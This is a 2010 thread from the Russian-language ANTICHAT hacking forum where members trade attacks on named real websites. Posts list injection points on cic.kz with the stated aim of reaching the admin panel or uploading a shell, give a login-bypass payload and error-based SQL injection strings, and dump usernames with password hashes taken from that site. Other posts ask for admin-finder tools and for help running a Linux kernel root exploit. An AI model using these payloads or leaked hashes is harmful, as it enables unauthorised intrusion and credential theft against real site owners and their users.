HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13951  
Старый 19.06.2010, 18:33
iSlava
Познающий
Регистрация: 24.08.2009
Сообщений: 67
Провел на форуме:
137206

Репутация: 10
По умолчанию

DrakonHaSh не работат. там есть заглушка на случай если файла нет на hdd, вот она показывается на data и php filter. возможно там пхп
 
Ответить с цитированием

  #13952  
Старый 19.06.2010, 19:51
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от -=ASSKAKO=-  
-=ASSKAKO=- said:
имеется иньекция при авторизации
Код:
Code:
http://cic.kz/admin/login
иньекция в поле поиска:
Код:
Code:
http://cic.kz/search/
пхпинфо:
Код:
Code:
http://cic.kz/phpinfo.php
практически все каталоги\папки доступны к индексированию:
Код:
Code:
http://cic.kz/classes/
http://cic.kz/wysiwyg/
раскрытие пути:
Код:
Code:
http://cic.kz/userfiles/LAW/kz/
http://cic.kz/wysiwyg/plugins/images/connector/yoursessioncheck.php
также имеется руки растущие оттуда, откуда сижу...
цель: получить доступ в админку либо залить шелл.
Проще некуда. В поле логин:

Код:
Code:
' or 1= 1 -- 
Без плюсов, только чистые пробелы.

Здравствуйте, Глеб. =)
 
Ответить с цитированием

  #13953  
Старый 19.06.2010, 21:47
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

а поле серч хекается при запросе

Код:
Code:
xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
добавление :

Ну короче поахал себе мозг, вот что вышло

table : users (id,login.password)

gleb:609562b36985b13c69167ed9b3525c0a

VS:016d36db759cbd97f97b8f44d1586020

и т.д.

С хешами я хз, все вместились или нет

запрос

Код:
Code:
xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)e)b)a)/**/and/**/'1'='1
вообще вот )
 
Ответить с цитированием

  #13954  
Старый 20.06.2010, 13:38
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Скажите есть какой-то софт для поиска админки на сайте?

Скуль хелпер не работает.
 
Ответить с цитированием

  #13955  
Старый 20.06.2010, 13:39
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от CyberHunter  
CyberHunter said:
Скажите есть какой-то софт для поиска админки на сайте?
Скуль хелпер не работает.
ArxScanSite,AdminFinder,IntelliTamper,DirBuster
 
Ответить с цитированием

  #13956  
Старый 20.06.2010, 16:30
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Помогите вывести версию БД.

http://www.syntex.sk/novinky.php?od=75+and+substring(version(),1,1)=5

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/html/syntex.sk/public_html/novinky.php on line 34
 
Ответить с цитированием

  #13957  
Старый 20.06.2010, 16:41
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

По моему там чтото типа такого:

SELECT * FROM mytable where od='.mysql_real_escape_string($_GET['od']).';

Поэтому когда ты ставишь ковычку или чтото ещё то запрос возвращает просто пустой результат)

там нет проверки mysql_num_rows, поэтому это не скуля
 
Ответить с цитированием

  #13958  
Старый 20.06.2010, 18:54
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861

Репутация: 5
Отправить сообщение для EoGeneo с помощью ICQ
По умолчанию

Помогите воспользоваться руткитом.

Собираюсь получить права рут на Linux Kernel 2.6.5

Вроде бы нашел сплойт http://milw0rm.com/exploits/8556

А как воспользоваться чётко незнаю.
 
Ответить с цитированием

  #13959  
Старый 20.06.2010, 19:47
iv.
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052

Репутация: 1204


По умолчанию

Цитата:
Сообщение от None  
Помогите воспользоваться руткитом.
Собираюсь получить права рут на Linux Kernel 2.6.5
Вроде бы нашел сплойт http://milw0rm.com/exploits/8556
А как воспользоваться чётко незнаю.
Ну, во-первых, это не руткит.

А как использовать можно найти в блоге автора - http://kernelbof.blogspot.com/2009/04/kernel-memory-corruptions-are-not-just.html В частности для компиляции нужны хедеры libsctp (пакет libsctp-dev для дебиана, например).
 
Ответить с цитированием

  #13960  
Старый 20.06.2010, 23:58
life_glider
Познающий
Регистрация: 13.04.2010
Сообщений: 42
Провел на форуме:
460968

Репутация: 81
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO counter (ip,cookie,date) values('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]session_id[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"',NOW())"[/COLOR][COLOR="#007700"];[/COLOR][/COLOR
уязвим ли данный код?(mq-off)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ